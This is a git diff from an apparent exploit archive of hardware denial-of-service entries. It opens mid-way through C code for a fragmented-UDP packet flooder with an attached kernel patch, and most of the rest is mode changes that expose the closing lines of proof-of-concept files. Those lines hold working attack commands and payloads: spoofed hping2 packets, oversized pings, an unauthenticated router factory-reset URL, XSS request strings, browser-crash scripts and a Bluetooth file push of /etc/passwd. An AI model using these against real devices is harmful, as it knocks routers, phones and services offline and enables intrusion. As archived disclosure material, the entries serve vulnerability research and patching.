UDP destination port */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ - if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, - sizeof(struct sockaddr)) == -1) - { - perror("\nsendto"); - free(packet); - exit(1); - } +if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, +sizeof(struct sockaddr)) == -1) +{ +perror("\nsendto"); +free(packet); +exit(1); +} - p_ptr = packet; - bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); - byte = 0x4F; /* IP version and header length */ - memcpy(p_ptr, &byte, sizeof(u_char)); - p_ptr += 2; /* IP TOS (skipped) */ - *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(242); /* IP id */ - p_ptr += 2; - *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ - p_ptr += 2; - *((u_short *)p_ptr) = 0x40; /* IP TTL */ - byte = IPPROTO_UDP; - memcpy(p_ptr + 1, &byte, sizeof(u_char)); - p_ptr += 4; /* IP checksum filled in by kernel */ - *((u_long *)p_ptr) = src_ip; /* IP source address */ - p_ptr += 4; - *((u_long *)p_ptr) = dst_ip; /* IP destination address */ - p_ptr += 44; - *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ +p_ptr = packet; +bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); +byte = 0x4F; /* IP version and header length */ +memcpy(p_ptr, &byte, sizeof(u_char)); +p_ptr += 2; /* IP TOS (skipped) */ +*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(242); /* IP id */ +p_ptr += 2; +*((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ +p_ptr += 2; +*((u_short *)p_ptr) = 0x40; /* IP TTL */ +byte = IPPROTO_UDP; +memcpy(p_ptr + 1, &byte, sizeof(u_char)); +p_ptr += 4; /* IP checksum filled in by kernel */ +*((u_long *)p_ptr) = src_ip; /* IP source address */ +p_ptr += 4; +*((u_long *)p_ptr) = dst_ip; /* IP destination address */ +p_ptr += 44; +*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ - for(i=0;i<PADDING;i++) - { - p_ptr[i++]=random()%255; - } +for(i=0;i<PADDING;i++) +{ +p_ptr[i++]=random()%255; +} - if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, - sizeof(struct sockaddr)) == -1) - { - perror("\nsendto"); - free(packet); - exit(1); - } - free(packet); - } +if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, +sizeof(struct sockaddr)) == -1) +{ +perror("\nsendto"); +free(packet); +exit(1); +} +free(packet); +} - u_long name_resolve(u_char *host_name) - { - struct in_addr addr; - struct hostent *host_ent; +u_long name_resolve(u_char *host_name) +{ +struct in_addr addr; +struct hostent *host_ent; - if ((addr.s_addr = inet_addr(host_name)) == -1) - { - if (!(host_ent = gethostbyname(host_name))) return (0); - bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length); - } - return (addr.s_addr); - } +if ((addr.s_addr = inet_addr(host_name)) == -1) +{ +if (!(host_ent = gethostbyname(host_name))) return (0); +bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length); +} +return (addr.s_addr); +} - void usage(u_char *name) - { - fprintf(stderr, - "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", - name); - exit(0); - } +void usage(u_char *name) +{ +fprintf(stderr, +"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", +name); +exit(0); +} - SOLUTION +/* +SOLUTION - Apply the following patch to icmp_fragment.c in your - kernel (fixes for Windows not yet determined). +Apply the following patch to icmp_fragment.c in your +kernel (fixes for Windows not yet determined). - (Patch from Alan Cox) +(Patch from Alan Cox) - --- ip_fragment.c.old Thu Apr 16 12:25:34 1998 - +++ ip_fragment.c Thu Apr 16 12:29:02 1998 - @@ -375,7 +375,7 @@ - fp = qp->fragments; - while(fp != NULL) - { - - if (fp->len < 0 || count+fp->len > skb->len) - + if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > - skb->len) - { - NETDEBUG(printk("Invalid fragment list: Fragment over - size.\n")); - ip_free(qp); \ No newline at end of file +--- ip_fragment.c.old Thu Apr 16 12:25:34 1998 ++++ ip_fragment.c Thu Apr 16 12:29:02 1998 +@@ -375,7 +375,7 @@ +fp = qp->fragments; +while(fp != NULL) +{ +- if (fp->len < 0 || count+fp->len > skb->len) ++ if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > +skb->len) +{ +NETDEBUG(printk("Invalid fragment list: Fragment over +size.\n")); +ip_free(qp); +*/ \ No newline at end of file diff --git a/platforms/hardware/dos/2246.cpp b/platforms/hardware/dos/2246.cpp old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22596.txt b/platforms/hardware/dos/22596.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22647.txt b/platforms/hardware/dos/22647.txt old mode 100755 new mode 100644 index 7d9c1686c..81e0fdcdf --- a/platforms/hardware/dos/22647.txt +++ b/platforms/hardware/dos/22647.txt @@ -25,4 +25,4 @@ D=......................................................................... ........................................................................... ........................................................................... ........................................................................... -.................... \ No newline at end of file +.................... \ No newline at end of file diff --git a/platforms/hardware/dos/22739.py b/platforms/hardware/dos/22739.py index 3313105c7..393ca658d 100755 --- a/platforms/hardware/dos/22739.py +++ b/platforms/hardware/dos/22739.py @@ -104,4 +104,4 @@ if __name__ == "__main__": for i in range(10000): frame = generator.next() time.sleep(0.100) - context.send_bytes(frame) \ No newline at end of file + context.send_bytes(frame) \ No newline at end of file diff --git a/platforms/hardware/dos/22797.txt b/platforms/hardware/dos/22797.txt old mode 100755 new mode 100644 index 5c51075ba..7a85ba01a --- a/platforms/hardware/dos/22797.txt +++ b/platforms/hardware/dos/22797.txt @@ -4,4 +4,4 @@ It has been reported that Cajun switches do not properly handle traffic to port The following proof of concept string has been made available: -\x80dupa \ No newline at end of file +\x80dupa \ No newline at end of file diff --git a/platforms/hardware/dos/22876.txt b/platforms/hardware/dos/22876.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22947.c b/platforms/hardware/dos/22947.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22950.txt b/platforms/hardware/dos/22950.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22978.txt b/platforms/hardware/dos/22978.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22983.txt b/platforms/hardware/dos/22983.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22991.txt b/platforms/hardware/dos/22991.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23087.c b/platforms/hardware/dos/23087.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23361.txt b/platforms/hardware/dos/23361.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23394.c b/platforms/hardware/dos/23394.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23508.txt b/platforms/hardware/dos/23508.txt old mode 100755 new mode 100644 index c8e18b2a6..3cefe4c55 --- a/platforms/hardware/dos/23508.txt +++ b/platforms/hardware/dos/23508.txt @@ -4,4 +4,4 @@ A problem has been identified in the YaSoft Switch Off software package when han perl -e "print 'a'x10240 . chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a);" > DoS.txt -nc 127.0.0.1 8000 < DoS.txt \ No newline at end of file +nc 127.0.0.1 8000 < DoS.txt \ No newline at end of file diff --git a/platforms/hardware/dos/23672.txt b/platforms/hardware/dos/23672.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23778.c b/platforms/hardware/dos/23778.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23786.c b/platforms/hardware/dos/23786.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23789.c b/platforms/hardware/dos/23789.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23876.txt b/platforms/hardware/dos/23876.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/23900.txt b/platforms/hardware/dos/23900.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/24143.c b/platforms/hardware/dos/24143.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/24344.txt b/platforms/hardware/dos/24344.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/24839.c b/platforms/hardware/dos/24839.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/24866.txt b/platforms/hardware/dos/24866.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/25082.txt b/platforms/hardware/dos/25082.txt old mode 100755 new mode 100644 index 754f291c0..64fb08648 --- a/platforms/hardware/dos/25082.txt +++ b/platforms/hardware/dos/25082.txt @@ -10,4 +10,4 @@ $ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/ Connecting to 192.168.1.2:80... connected. HTTP request sent, awaiting response... -=> And the PSUS4 is crashed. \ No newline at end of file +=> And the PSUS4 is crashed. \ No newline at end of file diff --git a/platforms/hardware/dos/25107.txt b/platforms/hardware/dos/25107.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/25124.txt b/platforms/hardware/dos/25124.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/25277.txt b/platforms/hardware/dos/25277.txt old mode 100755 new mode 100644 index 2bfd49166..3fff40348 --- a/platforms/hardware/dos/25277.txt +++ b/platforms/hardware/dos/25277.txt @@ -7,4 +7,4 @@ An attacker can exploit this condition by sending a large amount of ping request A successful attack can deny service to legitimate users. Send four consecutive requests of -ping -l 65500 -w 0 -t <IP of DSL Modem> \ No newline at end of file +ping -l 65500 -w 0 -t <IP of DSL Modem> \ No newline at end of file diff --git a/platforms/hardware/dos/25295.txt b/platforms/hardware/dos/25295.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/25402.txt b/platforms/hardware/dos/25402.txt old mode 100755 new mode 100644 index d7cbb0b2f..624189a29 --- a/platforms/hardware/dos/25402.txt +++ b/platforms/hardware/dos/25402.txt @@ -9,4 +9,4 @@ TO RESET IT USE THIS CODE: 277634#*#) 1- Save a mms draft with a dummy midi file 2- Connect mobile phone to PC and overwrite the dummy file with 'lgfreeze.mid'. -3- Send the mms draft. \ No newline at end of file +3- Send the mms draft. \ No newline at end of file diff --git a/platforms/hardware/dos/25711.txt b/platforms/hardware/dos/25711.txt old mode 100755 new mode 100644 index 2903e3f2b..d0ada4b6b --- a/platforms/hardware/dos/25711.txt +++ b/platforms/hardware/dos/25711.txt @@ -16,4 +16,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); ---- snip --- Chose any existing file and send it using obexftp: -# ./obexftp -b 00:0A:D9:E7:0B:1D --channel 2 -p /etc/passwd -v \ No newline at end of file +# ./obexftp -b 00:0A:D9:E7:0B:1D --channel 2 -p /etc/passwd -v \ No newline at end of file diff --git a/platforms/hardware/dos/25736.txt b/platforms/hardware/dos/25736.txt old mode 100755 new mode 100644 index e71093ca3..1449bbf38 --- a/platforms/hardware/dos/25736.txt +++ b/platforms/hardware/dos/25736.txt @@ -26,4 +26,4 @@ URL;WORK; EMAIL;PREF;INTERNET:bialoglowy@gmail.com REV:20050430T1958490 END:VCARD ---- Nokia9500.vcf --- \ No newline at end of file +--- Nokia9500.vcf --- \ No newline at end of file diff --git a/platforms/hardware/dos/25967.txt b/platforms/hardware/dos/25967.txt old mode 100755 new mode 100644 index 0569791cb..a02241d8f --- a/platforms/hardware/dos/25967.txt +++ b/platforms/hardware/dos/25967.txt @@ -8,4 +8,4 @@ This issue may be exploited to cause the affected application to restart, denyin This issue was originally documented in BID 14227. -wget http://www.example.com:2000 \ No newline at end of file +wget http://www.example.com:2000 \ No newline at end of file diff --git a/platforms/hardware/dos/26138.txt b/platforms/hardware/dos/26138.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/26233.txt b/platforms/hardware/dos/26233.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/26754.txt b/platforms/hardware/dos/26754.txt old mode 100755 new mode 100644 index d3b55b0c3..3be1beeb4 --- a/platforms/hardware/dos/26754.txt +++ b/platforms/hardware/dos/26754.txt @@ -6,4 +6,4 @@ This issue allows remote VPN users to bypass the administratively-defined securi :Loop copy x.scv local.scv -goto Loop \ No newline at end of file +goto Loop \ No newline at end of file diff --git a/platforms/hardware/dos/26825.txt b/platforms/hardware/dos/26825.txt old mode 100755 new mode 100644 index 1d2734905..18a557ee3 --- a/platforms/hardware/dos/26825.txt +++ b/platforms/hardware/dos/26825.txt @@ -8,4 +8,4 @@ This issue allows remote attackers to crash affected devices, or to temporarily Linksys BEFW11S4 and WRT54GS devices are reportedly affected by this issue. Due to code reuse among devices, other devices may also be affected. -hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file +hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file diff --git a/platforms/hardware/dos/26833.txt b/platforms/hardware/dos/26833.txt old mode 100755 new mode 100644 index 56834d7ed..59aa029dc --- a/platforms/hardware/dos/26833.txt +++ b/platforms/hardware/dos/26833.txt @@ -8,4 +8,4 @@ This issue allows remote attackers to crash affected devices, or to temporarily As no specific Cisco devices were identified by the reporter of this issue, all Cisco Catalyst devices have been marked as vulnerable. This BID will be updated as further information on affected packages is available. -hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file +hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file diff --git a/platforms/hardware/dos/26834.txt b/platforms/hardware/dos/26834.txt old mode 100755 new mode 100644 index 710488deb..183b3380d --- a/platforms/hardware/dos/26834.txt +++ b/platforms/hardware/dos/26834.txt @@ -10,4 +10,4 @@ Westell Versalink 327W is reportedly affected by this issue. Due to code reuse a The following Hping2 command is sufficient to crash affected devices. The IP addresses must both be configured on the targeted device: -hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file +hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file diff --git a/platforms/hardware/dos/26835.txt b/platforms/hardware/dos/26835.txt old mode 100755 new mode 100644 index a2ea46ee6..ac009f261 --- a/platforms/hardware/dos/26835.txt +++ b/platforms/hardware/dos/26835.txt @@ -10,4 +10,4 @@ Scientific Atlanta DPX2100 cable modems are reportedly affected by this issue. D The following Hping2 command is sufficient to crash affected devices. The IP addresses must both be configured on the targeted device: -hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file +hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1 \ No newline at end of file diff --git a/platforms/hardware/dos/27232.txt b/platforms/hardware/dos/27232.txt old mode 100755 new mode 100644 index eaa082097..145a5c18f --- a/platforms/hardware/dos/27232.txt +++ b/platforms/hardware/dos/27232.txt @@ -139,4 +139,4 @@ echo "You must compile replay_l2cap_packet_nokiaN70 before" echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c" exit -fi \ No newline at end of file +fi \ No newline at end of file diff --git a/platforms/hardware/dos/27241.c b/platforms/hardware/dos/27241.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/27942.txt b/platforms/hardware/dos/27942.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/28228.txt b/platforms/hardware/dos/28228.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/28230.txt b/platforms/hardware/dos/28230.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/2915.c b/platforms/hardware/dos/2915.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/29402.txt b/platforms/hardware/dos/29402.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/29767.txt b/platforms/hardware/dos/29767.txt old mode 100755 new mode 100644 index 3aef280bd..b941c6baa --- a/platforms/hardware/dos/29767.txt +++ b/platforms/hardware/dos/29767.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected device, denying further This issue affects Zyxel routers running ZynOS version 3.40. -sr(SMBMailSlot(name='\\M')) \ No newline at end of file +sr(SMBMailSlot(name='\\M')) \ No newline at end of file diff --git a/platforms/hardware/dos/30167.txt b/platforms/hardware/dos/30167.txt old mode 100755 new mode 100644 index 2bbfdd538..ce62588a9 --- a/platforms/hardware/dos/30167.txt +++ b/platforms/hardware/dos/30167.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote, authenticated attackers to reb PacketShaper 7.3.0g2 and 7.5.0g1 are vulnerable to this issue; other versions may also be affected. -http://www.example.com/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE= \ No newline at end of file +http://www.example.com/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE= \ No newline at end of file diff --git a/platforms/hardware/dos/30506.txt b/platforms/hardware/dos/30506.txt old mode 100755 new mode 100644 index 6a1480eb1..2431ef87b --- a/platforms/hardware/dos/30506.txt +++ b/platforms/hardware/dos/30506.txt @@ -11,4 +11,4 @@ This issue is documented as Cisco bug ID CSCsb08386. Cisco IOS releases in the 12.0, 12.1, 12.2, 12.3, and 12.4 ranges are vulnerable to this issue. show ip bgp regexp (.*)(_\1)+ -show ip bgp regexp ([0-9]*)(_\1)+ \ No newline at end of file +show ip bgp regexp ([0-9]*)(_\1)+ \ No newline at end of file diff --git a/platforms/hardware/dos/31102.c b/platforms/hardware/dos/31102.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/31306.txt b/platforms/hardware/dos/31306.txt old mode 100755 new mode 100644 index 286097187..a22f41a16 --- a/platforms/hardware/dos/31306.txt +++ b/platforms/hardware/dos/31306.txt @@ -8,4 +8,4 @@ Phones with firmware 0604DAS are vulnerable to this issue. Other versions are al The following command will demonstrate this issue: -ping -s 65500 <target> \ No newline at end of file +ping -s 65500 <target> \ No newline at end of file diff --git a/platforms/hardware/dos/31478.txt b/platforms/hardware/dos/31478.txt old mode 100755 new mode 100644 index e20b4f716..e1482a9b4 --- a/platforms/hardware/dos/31478.txt +++ b/platforms/hardware/dos/31478.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to deny access to the device's control center f Linksys SPA-2102 Phone Adapter running firmware 3.3.6 is vulnerable; other versions may also be affected. -ping -l 65500 192.168.0.1 \ No newline at end of file +ping -l 65500 192.168.0.1 \ No newline at end of file diff --git a/platforms/hardware/dos/31884.txt b/platforms/hardware/dos/31884.txt old mode 100755 new mode 100644 index f8b92b4db..b6b788356 --- a/platforms/hardware/dos/31884.txt +++ b/platforms/hardware/dos/31884.txt @@ -6,4 +6,4 @@ Successful exploits will deny service to legitimate users. Given the nature of t WRH54G firmware version 1.01.03 is vulnerable; other versions may also be affected. -http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page.asp \ No newline at end of file +http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page.asp \ No newline at end of file diff --git a/platforms/hardware/dos/32305.txt b/platforms/hardware/dos/32305.txt old mode 100755 new mode 100644 index 0b9aec26d..25d00b9b4 --- a/platforms/hardware/dos/32305.txt +++ b/platforms/hardware/dos/32305.txt @@ -7,4 +7,4 @@ Attackers can exploit this issue to crash the affected device, denying service t Dreambox DM500C is vulnerable; other models may also be affected. open|send GET http://www.example.com/aaa(...) -HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### * \ No newline at end of file +HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### * \ No newline at end of file diff --git a/platforms/hardware/dos/32341.html b/platforms/hardware/dos/32341.html old mode 100755 new mode 100644 index f6e3790c2..e1d6f7f3d --- a/platforms/hardware/dos/32341.html +++ b/platforms/hardware/dos/32341.html @@ -9,4 +9,4 @@ The following devices and corresponding firmware are affected: iPhone 1.1.4 and 2.0 iPod touch 1.1.4 and 2.0 -<html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html> \ No newline at end of file +<html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html> \ No newline at end of file diff --git a/platforms/hardware/dos/32472.txt b/platforms/hardware/dos/32472.txt old mode 100755 new mode 100644 index 82b733f72..77303c7f2 --- a/platforms/hardware/dos/32472.txt +++ b/platforms/hardware/dos/32472.txt @@ -4,4 +4,4 @@ Nokia Web Browser for S60 is prone to a denial-of-service vulnerability when han A successful exploit of this issue allows remote attackers to consume excessive system resources in the affected browser, which will cause the application to crash and deny service to legitimate users. Attackers may also be able to run arbitrary code, but this has not been confirmed. -<script> foo = new Array(); while(true) {foo = new Array(foo).sort();} </script> \ No newline at end of file +<script> foo = new Array(); while(true) {foo = new Array(foo).sort();} </script> \ No newline at end of file diff --git a/platforms/hardware/dos/32583.txt b/platforms/hardware/dos/32583.txt old mode 100755 new mode 100644 index 538ad23b0..11b0f7d6f --- a/platforms/hardware/dos/32583.txt +++ b/platforms/hardware/dos/32583.txt @@ -4,4 +4,4 @@ NETGEAR WGR614 is prone to a denial-of-service vulnerability that occurs in the Successful exploits will cause the affected web interface to crash, denying service to legitimate users. -http://www.example.com/? \ No newline at end of file +http://www.example.com/? \ No newline at end of file diff --git a/platforms/hardware/dos/32692.txt b/platforms/hardware/dos/32692.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/32702.txt b/platforms/hardware/dos/32702.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/33216.txt b/platforms/hardware/dos/33216.txt old mode 100755 new mode 100644 index 664281882..a50cd9e25 --- a/platforms/hardware/dos/33216.txt +++ b/platforms/hardware/dos/33216.txt @@ -8,4 +8,4 @@ NOTE: This BID was originally titled 'Microsoft Windows RDP Connection Denial of The following example is available: -for /L %i in (1,1,20) do mstsc /v:127.0.0.%i \ No newline at end of file +for /L %i in (1,1,20) do mstsc /v:127.0.0.%i \ No newline at end of file diff --git a/platforms/hardware/dos/33280.txt b/platforms/hardware/dos/33280.txt old mode 100755 new mode 100644 index 11c70821c..699629bd3 --- a/platforms/hardware/dos/33280.txt +++ b/platforms/hardware/dos/33280.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to cause an affected device to reboot. Given t Palm WebOS 1.1 is vulnerable; other versions may also be affected. -<meta http-equiv="refresh" content="1">AAAAA... using 50280 or more characters after the refresh. \ No newline at end of file +<meta http-equiv="refresh" content="1">AAAAA... using 50280 or more characters after the refresh. \ No newline at end of file diff --git a/platforms/hardware/dos/33328.txt b/platforms/hardware/dos/33328.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/34172.txt b/platforms/hardware/dos/34172.txt old mode 100755 new mode 100644 index bb775a657..ff6cc4168 --- a/platforms/hardware/dos/34172.txt +++ b/platforms/hardware/dos/34172.txt @@ -24,4 +24,4 @@ the Vulnerability allow unauthenticated users to remotely restart and reset the </html> Reset to factory configuration : --- Using Google Chrome browser : -to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar \ No newline at end of file +to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar \ No newline at end of file diff --git a/platforms/hardware/dos/34203.txt b/platforms/hardware/dos/34203.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/34306.txt b/platforms/hardware/dos/34306.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/34307.txt b/platforms/hardware/dos/34307.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/35345.txt b/platforms/hardware/dos/35345.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/358.txt b/platforms/hardware/dos/358.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/35939.txt b/platforms/hardware/dos/35939.txt old mode 100755 new mode 100644 index 9abaa7b34..0561629ac --- a/platforms/hardware/dos/35939.txt +++ b/platforms/hardware/dos/35939.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to cause a denial-of-service condition or http://www.example.com/natAdd?apptype=userdefined&rulename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=99 -http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3= \ No newline at end of file +http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3= \ No newline at end of file diff --git a/platforms/hardware/dos/363.txt b/platforms/hardware/dos/363.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/36825.php b/platforms/hardware/dos/36825.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/36868.pl b/platforms/hardware/dos/36868.pl index 122bbee19..bb006ca3d 100755 --- a/platforms/hardware/dos/36868.pl +++ b/platforms/hardware/dos/36868.pl @@ -40,4 +40,4 @@ send(SOCK, $test_payload, 0) || die "cannot send the payload!\n"; close(SOCK); print "done!\n"; exit(1); -#------------------------------------------------------------- \ No newline at end of file +#------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/hardware/dos/37199.txt b/platforms/hardware/dos/37199.txt old mode 100755 new mode 100644 diff --git 